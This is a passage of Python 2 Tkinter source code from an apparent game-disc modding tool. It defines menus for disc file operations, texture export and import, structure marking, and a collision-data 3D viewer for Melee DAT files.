ISOs, DATs = getRecentFilesLists() # Returns two lists of tuples (ISOs & DATs), where each tuple is a ( filepath, dateTimeObject )
ISOs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )
DATs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )
# Add the recent ISOs to the dropdown menu.
self.recentFilesMenu.add_command( label=' - Disc Images and Root Folders:', background='#d0e0ff', activeforeground='#000000', activebackground='#d0e0ff' ) # default color: 'SystemMenu'
for isosPath in ISOs:
filepath = isosPath[0].replace( '|', ':' )
parentDirPlusFilename = '\\' + os.path.split( os.path.dirname( filepath ) )[-1] + '\\' + os.path.basename( filepath )
self.recentFilesMenu.add_command( label=parentDirPlusFilename, command=lambda pathToLoad=filepath: self.loadRecentFile(pathToLoad) )
self.recentFilesMenu.add_separator()
# Add the recent DATs to the dropdown menu.
self.recentFilesMenu.add_command( label=' - DATs and Other Texture Data Files:', background='#d0e0ff', activeforeground='#000000', activebackground='#d0e0ff' )
for datsPath in DATs:
filepath = datsPath[0].replace( '|', ':' )
parentDirPlusFilename = '\\' + os.path.split( os.path.dirname( filepath ) )[-1] + '\\' + os.path.basename( filepath )
self.recentFilesMenu.add_command( label=parentDirPlusFilename, command=lambda pathToLoad=filepath: self.loadRecentFile(pathToLoad) )
def openLastUsedDir( self ):
openFolder(settings.get( 'General Settings', 'defaultSearchDirectory' ))
class settingsMenu( Tk.Menu, object ):
""" Once the checkbuttons have been created, they will stay updated in real time, since they're set using BoolVars. """
def __init__( self, parent, tearoff=True, *args, **kwargs ): # Create the menu and its contents
super( settingsMenu, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
self.add_command( label='Adjust Texture Filters', underline=15, command=setImageFilters ) # F
# Add disc related options
self.add_separator()
# self.add_command(label='Set General Preferences', command=setPreferences)
self.add_checkbutton( label='Use Disc Convenience Folders', underline=9, # C
variable=generalBoolSettings['useDiscConvenienceFolders'], command=saveSettingsToFile )
self.add_checkbutton( label='Avoid Rebuilding Disc', underline=0, # A
variable=generalBoolSettings['avoidRebuildingIso'], command=saveSettingsToFile )
self.add_checkbutton( label='Back-up Disc When Rebuilding', underline=0, # B
variable=generalBoolSettings['backupOnRebuild'], command=saveSettingsToFile )
self.add_checkbutton( label='Auto-Generate CSP Trim Colors', underline=5, # G
variable=generalBoolSettings['autoGenerateCSPTrimColors'], command=saveSettingsToFile )
# Add image-editing related options
self.add_separator()
# self.add_checkbutton( label='Dump Viewed PNGs', underline=0,
# variable=generalBoolSettings['dumpPNGs'], command=saveSettingsToFile ) # D
# self.add_checkbutton( label='Delete Image Dumps on Exit', underline=1,
# variable=generalBoolSettings['deleteImageDumpsOnExit'], command=saveSettingsToFile ) # E
self.add_checkbutton( label='Auto-Update Headers', underline=5,
variable=generalBoolSettings['autoUpdateHeaders'], command=saveSettingsToFile ) # U
self.add_checkbutton( label='Regenerate Invalid Palettes', underline=0,
variable=generalBoolSettings['regenInvalidPalettes'], command=saveSettingsToFile ) # R
self.add_checkbutton( label='Cascade Mipmap Changes', underline=8,
variable=generalBoolSettings['cascadeMipmapChanges'], command=saveSettingsToFile ) # M
self.add_checkbutton( label="Export Textures using Dolphin's Naming Convention", underline=32,
variable=generalBoolSettings['useDolphinNaming'], command=saveSettingsToFile ) # N
def repopulate( self ):
# Check the settings file, in case anything has been changed manually/externally.
# Any changes from within the program will have updated these here as well.
loadSettings()
class isoMenuOptions( Tk.Menu, object ):
def __init__( self, parent, tearoff=True, *args, **kwargs ):
super( isoMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
def repopulate( self ):
""" This method will be called every time the submenu is displayed. """
# Clear all current population
self.delete( 0, 'last' )
# Determine the kind of file(s)/folder(s) we're working with, to determine menu options
self.iidSelectionsTuple = Gui.isoFileTree.selection()
self.selectionCount = len( self.iidSelectionsTuple )
if self.selectionCount == 1:
self.entity = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )[1]
self.filename = os.path.basename( self.iidSelectionsTuple[0] ) # All iids are lowercase
else:
self.entity = ''
self.filename = ''
lastSeperatorAdded = False
# Check if this is a version of 20XX, and if so, get its main build number
self.orig20xxVersion = globalDiscDetails['is20XX'] # This is an empty string if the version is not detected or it's not 20XX
# Add main import/export options # Keyboard shortcuts:
if self.iidSelectionsTuple:
self.add_command( label='Export File(s)', underline=0, command=exportIsoFiles ) # E
self.add_command( label='Export Textures From Selected', underline=1, command=exportSelectedFileTextures ) # X
self.add_command( label='Import File', underline=0, command=importSingleIsoFile ) # I
self.add_command( label='Import Multiple Files', underline=7, command=importMultipleIsoFiles ) # M
self.add_separator()
# Add supplemental disc functions
self.add_command( label='Add File(s) to Disc', underline=4, command=addFilesToIso ) # F
self.add_command( label='Add Directory of File(s) to Disc', underline=4, command=addDirectoryOfFilesToIso ) # D
self.add_command( label='Create Directory', underline=0, command=createDirectoryInIso ) # C
if self.iidSelectionsTuple:
if self.selectionCount == 1:
if self.entity == 'file':
self.add_command( label='Rename Selected File', underline=2, command=renameItem ) # N
else:
self.add_command( label='Rename Selected Folder', underline=2, command=renameItem ) # N
if globalDiscDetails['is20XX'] and self.entity == 'file' and self.filename.startswith( 'gr' ): # A single stage file is chosen
# Get the full case-sensitive file name
iidValues = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )
fullFileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath
if get20xxRandomNeutralNameOffset( fullFileName )[0] != -1:
self.add_command( label='Rename Random Neutral Nickname', underline=16, command=self.renameRandomNeutralStage ) # U
self.add_command( label='Remove Selected Item(s)', underline=0, command=removeItemsFromIso ) # R
self.add_command( label='Move Selected to Directory', underline=1, command=moveSelectedToDirectory ) # O
# Add file operations
if self.selectionCount == 1 and self.entity == 'file':
self.add_separator()
self.add_command( label='View Hex', underline=5, command=viewFileHexFromFileTree ) # H
self.add_command( label='Copy Offset to Clipboard', underline=2, command=self.copyFileOffsetToClipboard ) # P
self.add_command( label='Browse Textures', underline=0, command=browseTexturesFromDisc ) # B
self.add_command( label='Analyze Structure', underline=0, command=analyzeFileFromDisc ) # A
elif self.selectionCount > 1:
# Check if all of the items are files
for iid in self.iidSelectionsTuple:
if Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )[1] != 'file': break
else: # The loop above didn't break; only files here
self.add_separator()
self.add_command( label='Copy Offsets to Clipboard', underline=2, command=self.copyFileOffsetToClipboard ) # P
# Add an option for CSP Trim Colors, if it's appropriate
if self.iidSelectionsTuple and self.orig20xxVersion:
if 'BETA' in self.orig20xxVersion:
majorBuildNumber = int( self.orig20xxVersion[-1] )
else: majorBuildNumber = int( self.orig20xxVersion[0] )
# Check if any of the selected files are an appropriate character alt costume file
for iid in self.iidSelectionsTuple:
filename = os.path.basename( iid )
thisEntity = Gui.isoFileTree.item( iid, 'values' )[1] # Will be a string of 'file' or 'folder'
if thisEntity == 'file' and candidateForTrimColorUpdate( filename, self.orig20xxVersion, majorBuildNumber ):
if not lastSeperatorAdded:
self.add_separator()
lastSeperatorAdded = True
self.add_command( label='Generate CSP Trim Colors', underline=0, command=self.prepareForTrimColorGeneration ) # G
break
if self.entity == 'file' and self.filename.startswith( 'pl' ):
if not lastSeperatorAdded:
self.add_separator()
lastSeperatorAdded = True
self.add_command( label='Set as CCC Source File', underline=11, command=lambda: self.cccSelectFromDisc( 'source' ) ) # S
self.add_command( label='Set as CCC Destination File', underline=11, command=lambda: self.cccSelectFromDisc( 'dest' ) ) # D
def prepareForTrimColorGeneration( self ):
""" One of the primary methods for generating CSP Trim Colors.
If only one file is being operated on, the user will be given a prompt to make the final color selection.
If multiple files are selected, the colors will be generated and selected autonomously, with no user prompts. """
# Make sure that the disc file can still be located
if not discDetected(): return
if self.selectionCount == 1:
generateTrimColors( self.iidSelectionsTuple[0] )
else: # Filter the selected files and operate on all alt costume files only, in autonomous mode
for iid in self.iidSelectionsTuple:
filename = os.path.basename( iid )
thisEntity = Gui.isoFileTree.item( iid, 'values' )[1] # Will be a string of 'file' or 'folder'
if 'BETA' in self.orig20xxVersion: origMainBuildNumber = int( self.orig20xxVersion[-1] )
else: origMainBuildNumber = int( self.orig20xxVersion[0] )
if thisEntity == 'file' and candidateForTrimColorUpdate( filename, self.orig20xxVersion, origMainBuildNumber ):
generateTrimColors( iid, True ) # autonomousMode=True means it will not prompt the user to confirm its main color choices
def cccSelectFromDisc( self, role ): # Select a file in a disc as input to the Character Color Converter
# Double-check that the disc file can still be located
if not discDetected(): return
# Disc verified; proceed
datHex = getFileDataFromDiscTree( iid=self.iidSelectionsTuple[0] )
if datHex:
prepareColorConversion( self.iidSelectionsTuple[0], datHex, role )
# Switch to the CCC tab if both source and destination files have been provided.
if CCC['dataStorage']['sourceFile'] != '' and CCC['dataStorage']['destFile'] != '': Gui.mainTabFrame.select( Gui.cccTab )
def copyFileOffsetToClipboard( self ):
Gui.isoFileTree.selection_set( self.iidSelectionsTuple ) # Highlights the item(s)
Gui.isoFileTree.focus( self.iidSelectionsTuple[0] ) # Sets keyboard focus to the first item
# Get the hashes of all of the items selected
offsets = []
for iid in self.iidSelectionsTuple:
isoOffset = Gui.isoFileTree.item( iid, 'values' )[2]
offsets.append( isoOffset )
copyToClipboard( ', '.join(offsets) )
def renameRandomNeutralStage( self ):
# Get the full case-sensitive file name
iidValues = Gui.isoFileTree.item( self.iidSelectionsTuple[0], 'values' )
fullFileName = iidValues[4].split( '/' )[-1] # 5th item in iidValues is isoPath
# Get the current name
cssData0Iid = scanDiscForFile( 'MnSlChr.0' )
cssData1Iid = scanDiscForFile( 'MnSlChr.1' )
cssData0 = getFileDataFromDiscTreeAsBytes( iid=cssData0Iid )
nameOffset = get20xxRandomNeutralNameOffset( fullFileName )[0]
originalName = cssData0[nameOffset:nameOffset+0x20].split('\x00')[0].decode( 'ascii' )
# Prompt the user to enter a new name, and validate it
nameChecksOut = False
while not nameChecksOut:
popupWindow = PopupEntryWindow( Gui.root, message='Enter a new stage nickname:', defaultText=originalName, width=40 )
newName = popupWindow.entryText.replace( '"', '' ).strip()
if newName == '': break
# Validate the name length
if len( newName ) > 31:
msg( 'Please specify a name less than 31 characters in length.' )
continue
# Exclude some special characters
for char in [ '\n', '\t' ]:
if char in newName:
msg( 'Line breaks or tab characters may not be included in the name.' )
break
else: # The above loop didn't break (meaning an invalid character wasn't found)
# Convert the name to bytes and validate the length
try:
nameBytes = bytearray()
nameBytes.extend( newName )
if len( nameBytes ) <= 0x1F:
# Add padding to make sure any old text is overwritten. Must end with at least one null byte
nameBytes.extend( (0x20 - len(nameBytes)) * b'\00' )
nameChecksOut = True
else:
msg( 'Unable to encode the new name into 31 bytes. Try shortening the name.' )
except:
msg( 'Unable to encode the new name into 31 bytes. There may be an invalid character.' )
if not newName: # User canceled above name input window
return
# Write the new name's bytes into both CSS files at the appropriate location
cssData1 = getFileDataFromDiscTreeAsBytes( iid=cssData1Iid )
nameBytesLength = len( nameBytes )
cssData0[nameOffset:nameOffset+nameBytesLength] = nameBytes
cssData1[nameOffset:nameOffset+nameBytesLength] = nameBytes
# Save the new CSS file data to disc
_, _, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( cssData0Iid, 'values' )
Gui.isoFileTree.item( cssData0Iid, values=('Stage name updated', 'file', isoOffset, fileSize, isoPath, 'ram', hexlify(cssData0)), tags='changed' )
_, _, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( cssData1Iid, 'values' )
Gui.isoFileTree.item( cssData1Iid, values=('Stage name updated', 'file', isoOffset, fileSize, isoPath, 'ram', hexlify(cssData1)), tags='changed' )
# Update the name shown for the stage in question
Gui.isoFileTree.item( self.iidSelectionsTuple[0], values=(' '+newName,)+iidValues[1:] ) # Extra spaces added to indent the name from the stage folder name
# Remember these changes, and update the program status
unsavedDiscChanges.append( 'Random Neutral stage name updated.' )
updateProgramStatus( 'Stage Name Updated' )
class textureMenuOptions( Tk.Menu, object ):
def __init__( self, parent, tearoff=True, *args, **kwargs ):
super( textureMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
def repopulate( self ):
""" This method will be called every time the submenu is displayed. """
# Clear all current population
self.delete( 0, 'last' )
self.lastItem = ''
# Check if anything is currently selected
self.iids = Gui.datTextureTree.selection() # Returns a tuple of iids, or an empty string if nothing is selected.
self.selectionCount = len( self.iids )
if self.iids: # Keyboard shortcuts:
self.lastItem = self.iids[-1] # Selects the lowest position item selected in the treeview.
self.add_command( label='Export Selected Texture(s)', underline=0, command=exportTextures ) # E
self.add_command( label='Export All', underline=7, command=self.exportAllTextures ) # A
self.add_command( label='Import Texture(s)', underline=0, command=importImageFiles ) # I
self.add_separator()
self.add_command( label='Blank Texture (Zero-out)', underline=0, command=blankTextures ) # B
#self.add_command(label='Disable (Prevents Rendering)', underline=0, command=disableTextures )
if self.selectionCount > 1:
self.add_command( label='Copy Offsets to Clipboard', underline=0, command=self.textureOffsetToClipboard ) # C
self.add_command( label='Copy Dolphin Hashes to Clipboard', underline=13, command=self.dolphinHashToClipboard ) # H
else:
self.add_command( label='Show in Structural Analysis', underline=0, command=self.showTextureInStructAnalysisTab ) # S
self.add_command( label='Copy Offset to Clipboard', underline=0, command=self.textureOffsetToClipboard ) # C
self.add_command( label='Copy Dolphin Hash to Clipboard', underline=13, command=self.dolphinHashToClipboard ) # H
else:
self.add_command( label='Export All', underline=7, command=self.exportAllTextures ) # A
def exportAllTextures( self ):
if len( Gui.datTextureTree.get_children() ) == 0:
msg( 'You need to first open a file that you would like to export textures from.'
'\n\n(If you have loaded a file, either there were no textures found, or '
'you have texture filters blocking your results.)' )
else:
exportTextures( exportAll=True )
def showTextureInStructAnalysisTab( self ):
# Set the selected item in DAT Texture Tree, so that it's clear which image is being operated on
Gui.datTextureTree.selection_set( self.lastItem )
Gui.datTextureTree.focus( self.lastItem )
# Make sure the current iid is the start of a structure (may not be in the case of particle effects)
structOffset = int( self.lastItem )
if not self.lastItem in globalDatFile.structureOffsets:
structOffset = globalDatFile.getPointerOwner( structOffset, True )
# Add the texture's data block instances to the tree and show them
showStructInStructuralAnalysis( structOffset )
# Switch to the SA tab
Gui.mainTabFrame.select( Gui.savTab )
def textureOffsetToClipboard( self ):
Gui.datTextureTree.selection_set( self.iids ) # Highlights the item(s)
Gui.datTextureTree.focus( self.iids[0] ) # Sets keyboard focus to the first item
# Get the offsets of all of the items selected
offsets = []
for iid in self.iids:
imageDataDetails = Gui.datTextureTree.item( iid, 'values' )[0]
offsets.append( imageDataDetails.split()[0] )
copyToClipboard( ', '.join(offsets) )
def dolphinHashToClipboard( self ):
Gui.datTextureTree.selection_set( self.iids ) # Highlights the item(s)
Gui.datTextureTree.focus( self.iids[0] ) # Sets keyboard focus to the first item
# Get the hashes of all of the items selected
hashedFileNames = []
for iid in self.iids:
hashedFileNames.append( constructTextureFilename( globalDatFile, iid, forceDolphinHash=True ) )
copyToClipboard( ', '.join(hashedFileNames) )
class structureMenuOptions( Tk.Menu, object ):
def __init__( self, parent, tearoff=True, *args, **kwargs ):
super( structureMenuOptions, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
def repopulate( self ):
""" This method will be called every time the submenu is displayed. """
# Clear all current population
self.delete( 0, 'last' )
# Determine the kind of structure(s) we're working with, to determine menu options
self.iids = Gui.fileStructureTree.selection()
self.selectionCount = len( self.iids )
if self.selectionCount == 1: # Keyboard shortcuts:
itemName = Gui.fileStructureTree.item( self.iids[0], 'text' )
if itemName == 'coll_data':
#collDataOffset = int( self.iids[0].split('/')[-1] )
self.add_command( label='Render', underline=0, command=self.renderCollisions )
self.add_command( label='Copy Offset to Clipboard', underline=0, command=self.offsetToClipboard ) # C
# Check the kind of structure clicked on
structOffset = int( self.iids[0].split('/')[-1] )
structure = globalDatFile.getStruct( structOffset )
if structure.__class__ in ( hsdStructures.ImageObjDesc, hsdStructures.TextureObjDesc, hsdStructures.ImageDataBlock ):
self.add_command( label='Show in DAT Texture Tree', underline=0, command=self.showInDatTextureTree ) # S
# Check if the currently selected item is 'marked'
currentTags = Gui.fileStructureTree.item( self.iids[0], 'tags' )
if 'marked' in currentTags:
self.add_command( label='Unmark Selected Struct', underline=0, command=self.unmarkSelectedStructs ) # U
else:
self.add_command( label='Mark Selected Struct', underline=0, command=self.markSelectedStructs ) # M
self.add_separator()
elif self.selectionCount > 1:
self.add_command( label='Copy Offsets to Clipboard', underline=0, command=self.offsetToClipboard ) # C
# Check if there are more marked or unmarked items selected
markedItems = 0
unmarkedItems = 0
for iid in self.iids:
if 'marked' in Gui.fileStructureTree.item( iid, 'tags' ): markedItems += 1
else: unmarkedItems += 1
if markedItems >= unmarkedItems:
self.add_command( label='Unmark Selected Structs', underline=0, command=self.unmarkSelectedStructs ) # U
else:
self.add_command( label='Mark Selected Structs', underline=0, command=self.markSelectedStructs ) # M
self.add_separator()
self.add_command( label='Collapse Data Space', underline=1, command=self.collapseDataSpace ) # O
self.add_command( label='Extend Data Space', underline=0, command=self.extendDataSpace ) # E
def offsetToClipboard( self ):
Gui.fileStructureTree.selection_set( self.iids ) # Highlights the item(s)
Gui.fileStructureTree.focus( self.iids[0] ) # Sets keyboard focus to the first item
# Get the offsets of all of the items selected
offsets = []
for iid in self.iids:
offset = int( iid.split('/')[-1] )
offsets.append( uHex(0x20+offset) )
copyToClipboard( ', '.join(offsets) )
def showInDatTextureTree( self ):
# Check the kind of structure clicked on
structOffset = int( self.iids[0].split('/')[-1] )
structure = globalDatFile.getStruct( structOffset )
# Get the image data offset (whether from the TObj or another lower structure)
if structure.__class__ == hsdStructures.TextureObjDesc:
imageHeaderOffset = structure.getValues( 'Image_Header_Pointer' )
imageHeader = globalDatFile.getStruct( imageHeaderOffset )
imageDataOffset = imageHeader.getValues()[0]
elif structure.__class__ == hsdStructures.ImageObjDesc:
imageDataOffset = structure.getValues()[0]
else: # Should be an ImageDataBlock
imageDataOffset = structure.offset
targetIid = str( imageDataOffset )
# Make sure the DAT Texture Tree tab has been populated
if not Gui.datTextureTree.get_children() or not Gui.datTextureTree.exists( targetIid ):
clearDatTab()
scanDat( priorityTargets=(imageDataOffset,) )
# Look for this texture in the DAT Texture Tree tab
if Gui.datTextureTree.exists( targetIid ):
# Switch tabs, and select the target texture
Gui.mainTabFrame.select( Gui.datTab )
Gui.datTextureTree.selection_set( targetIid )
Gui.datTextureTree.see( targetIid )
else: # ¿Qué?
print 'Unable to find {} (0x{:X}) in the DAT Texture Tree tab.'.format( targetIid, 0x20+int(targetIid) )
msg( 'The image for ' + structure.name + ' could not\nbe found in the DAT Texture Tree tab!', '¿Qué?' )
def markSelectedStructs( self ):
# Add tags to the selected items
for iid in self.iids:
currentTags = Gui.fileStructureTree.item( iid, 'tags' )
if not currentTags:
Gui.fileStructureTree.item( iid, tags='marked' )
elif 'marked' not in currentTags:
currentTags.append( 'marked' )
Gui.fileStructureTree.item( iid, tags=currentTags )
def unmarkSelectedStructs( self ):
# Add tags to the selected items
for iid in self.iids:
try:
currentTags = list( Gui.fileStructureTree.item( iid, 'tags' ) )
currentTags.remove( 'marked' )
Gui.fileStructureTree.item( iid, tags=currentTags )
except Exception as e:
print "Unable to remove 'marked' selection status from", iid
print e
def collapseDataSpace( self ):
modifierWindow = DataSpaceModifierWindow( Gui.root, 'collapse' )
if modifierWindow.offset and modifierWindow.amount:
# Perform some basic validation and typcasting
try:
offset = int( modifierWindow.offset, 16 ) - 0x20
amount = int( modifierWindow.amount, 16 )
except Exception as err:
print err
msg( 'Invalid input values.' )
return
globalDatFile.collapseDataSpace( offset, amount )
# Need to reinitialize file structures
clearStructuralAnalysisTab()
analyzeDatStructure()
updateProgramStatus( 'File Data Collapsed' )
def extendDataSpace( self ):
modifierWindow = DataSpaceModifierWindow( Gui.root, 'extend' )
if modifierWindow.offset and modifierWindow.amount:
# Perform some basic validation and typcasting
try:
offset = int( modifierWindow.offset, 16 ) - 0x20
amount = int( modifierWindow.amount, 16 )
except Exception as err:
print err
msg( 'Invalid input values.' )
return
globalDatFile.extendDataSpace( offset, amount )
# Need to reinitialize file structures
clearStructuralAnalysisTab()
analyzeDatStructure()
updateProgramStatus( 'File Data Extended' )
def renderCollisions( self ):
CollisionsEditor( int(self.iids[0].split('/')[-1]) )
class CollisionsEditor( basicWindow ):
def __init__( self, collStructOffset ):
basicWindow.__init__( self, Gui.root, 'Collision Data for ' + globalDatFile.fileName, offsets=(0, 30), topMost=False, resizable=True, minsize=(600, 350) )
self.highlightedLabels = []
self.highlightedId = None
# Get the structures defining the stage's spot, links, and areas (they should already be initialized)
self.collStruct = globalDatFile.structs[ collStructOffset ]
spotTableOffset, linkTableOffset, areaTableOffset = self.collStruct.getChildren()
self.spotTable = globalDatFile.structs[ spotTableOffset ]
self.linkTable = globalDatFile.structs[ linkTableOffset ]
self.areaTable = globalDatFile.structs[ areaTableOffset ]
self.vertices = self.spotTable.getVertices()
self.collisionLinks = self.linkTable.getFaces()
self.areas = self.areaTable.getAreas()
self.showAreas = Tk.BooleanVar( value=False )
self.showBasicLinks = Tk.BooleanVar( value=True )
# self.showPreLinks = Tk.BooleanVar( value=False )
# self.showPostLinks = Tk.BooleanVar( value=False )
# Get reference counts for spots, and set render status
spotRefCounts = {}
for link in self.collisionLinks:
for index in link.allSpotIndices:
if index == -1: continue
elif index in spotRefCounts:
spotRefCounts[index] += 1
else:
spotRefCounts[index] = 1
# if link.type == 'pre': link.render = self.showPreLinks.get()
# elif link.type == 'post': link.render = self.showPostLinks.get()
# else:
link.render = self.showBasicLinks.get() # Basic links
# Convert the 2D collision lines to 3D collision surfaces
self.extrudeCollisionLinks()
# Create vertices from the areas, and add them to the vertices list (replacing orig values with indices in collision object)
self.areaVertices = []
areaVerticesIndex = len( self.vertices ) + len( self.collVertices )
for i, area in enumerate( self.areas, start=1 ):
area.number = i
area.origPoints = botLeftX, botLeftY, topRightX, topRightY = area.points
self.areaVertices.append( RenderEngine.Vertex(( botLeftX, botLeftY, 0 )) )
self.areaVertices.append( RenderEngine.Vertex(( botLeftX, topRightY, 0 )) )
self.areaVertices.append( RenderEngine.Vertex(( topRightX, topRightY, 0 )) )
self.areaVertices.append( RenderEngine.Vertex(( topRightX, botLeftY, 0 )) )
area.points = ( areaVerticesIndex, areaVerticesIndex+1, areaVerticesIndex+2, areaVerticesIndex+3 )
area.render = self.showAreas.get()
areaVerticesIndex += 4
#vertices = [[-1,-1,-1],[-1,-1,1],[-1,1,1],[-1,1,-1],[1,-1,-1],[1,-1,1],[1,1,1],[1,1,-1]] # cube points
#collisionLinks = [[0,1,2],[0,2,3],[2,3,7],[2,7,6],[1,2,5],[2,5,6],[0,1,4],[1,4,5],[4,5,6],[4,6,7],[3,7,4],[4,3,0]] # cube point indices
#collisionLinks = [ (0,3), (3,7), (7,4), (4,0) ] # one cube face (lines)
#vertices.extend( [[-1,-1,-1], [-1,1,-1], [1,1,-1], [1,-1,-1]] )
# vertices.extend( [[-10,-10,-10], [-10,10,-10], [10,10,-10], [10,-10,-10]] )
# collisionLinks.extend( [ (-4,-3), (-3,-2), (-2,-1), (-1,-4) ] )
allVertices = self.vertices + self.collVertices + self.areaVertices
self.renderPlane = RenderEngine.Engine3D( self.mainFrame, allVertices, self.collisionLinks + self.areas, width=800, height=600, background='black' )
self.renderPlane.grid( column=0, row=0, sticky='nsew' )
self.renderPlane.focus_set()
# Bind event handlers
self.renderPlane.tag_bind( 'CollissionSurface', '<Enter>', self.collSurfaceHovered )
self.renderPlane.tag_bind( 'CollissionSurface', '<Leave>', self.linkTabLinkUnhovered )
# self.renderPlane.tag_bind( 'ColCalcArea', '<Enter>', self.areaHovered )
# self.renderPlane.tag_bind( 'ColCalcArea', '<Leave>', self.areaUnhovered )
# Build out the panels on the right-hand side
self.structuresPanel = ttk.Notebook( self.mainFrame )
self.populateSpotsTab( spotRefCounts )
self.linksTab = ttk.Frame( self.structuresPanel )
self.structuresPanel.add( self.linksTab, text=' Links ' )
self.linksInnerFrame = VerticalScrolledFrame( self.linksTab )
self.populateLinksTab()
self.populateAreasTab()
self.populateRenderingTab()
self.structuresPanel.grid( column=1, row=0, sticky='nsew' )
# Enable resizing of the grid cells
self.mainFrame.grid_columnconfigure( 0, weight=3 )
self.mainFrame.grid_columnconfigure( 1, weight=1, minsize=250 )
self.mainFrame.grid_rowconfigure( 0, weight=1 )
def extrudeCollisionLinks( self ):
""" Extrudes each collision link (which are initially 2D lines), turning them into 3D faces. """
self.collVertices = []
collFaceThickness = 7
origVerticesLength = len( self.vertices )
for link in self.collisionLinks:
# Perform some validation
link.validIndices = True
if link.points[0] < 0 or link.points[0] >= origVerticesLength: link.validIndices = False
if link.points[1] < 0 or link.points[1] >= origVerticesLength: link.validIndices = False
for pointIndex in link.allSpotIndices[2:]:
if pointIndex < -1 or pointIndex >= origVerticesLength:
print 'link', link.index, 'refereneces a non-existant point (index', str(pointIndex) + ')'
break
link.origPoints = link.points
if not link.validIndices: continue
# Create two new vertices for spot 1
originalVertex = self.vertices[ link.points[0] ]
newCoords = ( originalVertex.x, originalVertex.y, collFaceThickness )
if newCoords not in self.collVertices:
self.collVertices.append( newCoords )
pointIndex1 = origVerticesLength + self.collVertices.index( newCoords )
newCoords = ( originalVertex.x, originalVertex.y, -collFaceThickness )
if newCoords not in self.collVertices:
self.collVertices.append( newCoords )
pointIndex2 = origVerticesLength + self.collVertices.index( newCoords )
# Create two new vertices for spot 2
originalVertex = self.vertices[ link.points[1] ]
newCoords = ( originalVertex.x, originalVertex.y, collFaceThickness )
if newCoords not in self.collVertices:
self.collVertices.append( newCoords )
pointIndex3 = origVerticesLength + self.collVertices.index( newCoords )
newCoords = ( originalVertex.x, originalVertex.y, -collFaceThickness )
if newCoords not in self.collVertices:
self.collVertices.append( newCoords )
pointIndex4 = origVerticesLength + self.collVertices.index( newCoords )
# Save the new link indices
link.points = ( pointIndex1, pointIndex3, pointIndex4, pointIndex2 )
# Create new vertices for the new points, and store them with the rest of the vertices list
for i, coords in enumerate( self.collVertices ):
self.collVertices[i] = RenderEngine.Vertex( coords )
def populateSpotsTab( self, spotRefCounts ):
self.spotsTab = ttk.Frame( self.structuresPanel )
self.structuresPanel.add( self.spotsTab, text=' Spots ' )
spotsInnerFrame = VerticalScrolledFrame( self.spotsTab )
Tk.Label( spotsInnerFrame.interior, text='X/Y Coords:' ).grid( column=0, row=0, padx=50, sticky='w' )
Tk.Label( spotsInnerFrame.interior, text='Reference Count:' ).grid( column=1, row=0, columnspan=2, sticky='e', padx=20 )
spotOffset = 0x20 + self.spotTable.offset
row = 1
for vertex in self.vertices:
spotLabel = Tk.Label( spotsInnerFrame.interior, text='{}: ({}, {})'.format(row-1, vertex.x, vertex.y * -1) ) # Y values inverted
spotLabel.grid( column=0, row=row, columnspan=2, padx=(15,0), sticky='w' )
referenceCount = spotRefCounts.get( row-1, 0 )
Tk.Label( spotsInnerFrame.interior, text=str( referenceCount ) ).grid( column=2, row=row, sticky='e', padx=(15,15) )
ToolTip( spotLabel, 'File Offset: 0x{:X}'.format(spotOffset) )
spotOffset += 8
row += 1
spotsInnerFrame.pack( fill='both', expand=True )
def populateLinksTab( self ):
origVerticesLength = len( self.vertices )
Tk.Label( self.linksInnerFrame.interior, text='Spot 1 & 2 References:' ).grid( column=0, row=0, padx=50, sticky='w' )
linkOffset = 0x20 + self.linkTable.offset
row = 1
for link in self.collisionLinks:
#if not link.type == 'basic': continue # Skip pre/post/virtual links
fontColor = 'black'
if link.origPoints[0] < 0 or link.origPoints[0] >= origVerticesLength:
pointText0 = 'Invalid'
fontColor = 'red'
else:
pointText0 = link.origPoints[0]
if link.origPoints[1] < 0 or link.origPoints[1] >= origVerticesLength:
pointText1 = 'Invalid'
fontColor = 'red'
else:
pointText1 = link.origPoints[1]
# Add the label
label = Tk.Label( self.linksInnerFrame.interior, text='{}, 0x{:X}: ({}, {})'.format(row, linkOffset, pointText0, pointText1), fg=fontColor )
label.grid( column=0, row=row, ipadx=15, padx=15 )
label.link = link
if fontColor != 'red':
label.bind( '<Enter>', self.linkTabLinkHovered )
label.bind( '<Leave>', self.linkTabLinkUnhovered )
#ToolTip( label, 'File Offset: 0x{:X}'.format(linkOffset) )
# Add delete button
# deleteLabel = ttk.Button( self.linksInnerFrame.interior, text='Delete' )
# deleteLabel.configure( command=lambda linkIndex=link.index: self.deleteLink(linkIndex) )
# deleteLabel.grid( column=1, row=row, padx=15 )
# deleteLabel.bind( '<Enter>', self.linkTabLinkHovered )
# deleteLabel.bind( '<Leave>', self.linkTabLinkUnhovered )
linkOffset += 0x10
row += 1
self.linksInnerFrame.pack( fill='both', expand=True )
def populateAreasTab( self ):
self.areasTab = ttk.Frame( self.structuresPanel )
self.structuresPanel.add( self.areasTab, text=' Areas ' )
areasInnerFrame = VerticalScrolledFrame( self.areasTab )
areaOffset = 0x20 + self.areaTable.offset
row = 1
for area in self.areas:
areaHeader = Tk.Label( areasInnerFrame.interior, text='\tArea {}:'.format(row/3+1) )
areaHeader.grid( column=0, row=row, padx=15, sticky='w' )
Tk.Label( areasInnerFrame.interior, text='Bottom-left coords: ({}, {})'.format(area.origPoints[0], area.origPoints[1]) ).grid( column=0, row=row+1, padx=15, sticky='w' )
Tk.Label( areasInnerFrame.interior, text='Top-Right coords: ({}, {})'.format(area.origPoints[2], area.origPoints[3]) ).grid( column=0, row=row+2, padx=15, sticky='w' )
ToolTip( areaHeader, 'File Offset: 0x{:X}'.format(areaOffset) )
areaOffset += 0x28
row += 3
areasInnerFrame.pack( fill='both', expand=True )
def populateRenderingTab( self ): # i.e. Settings
self.renderingTab = ttk.Frame( self.structuresPanel )
self.structuresPanel.add( self.renderingTab, text=' Rendering ' )
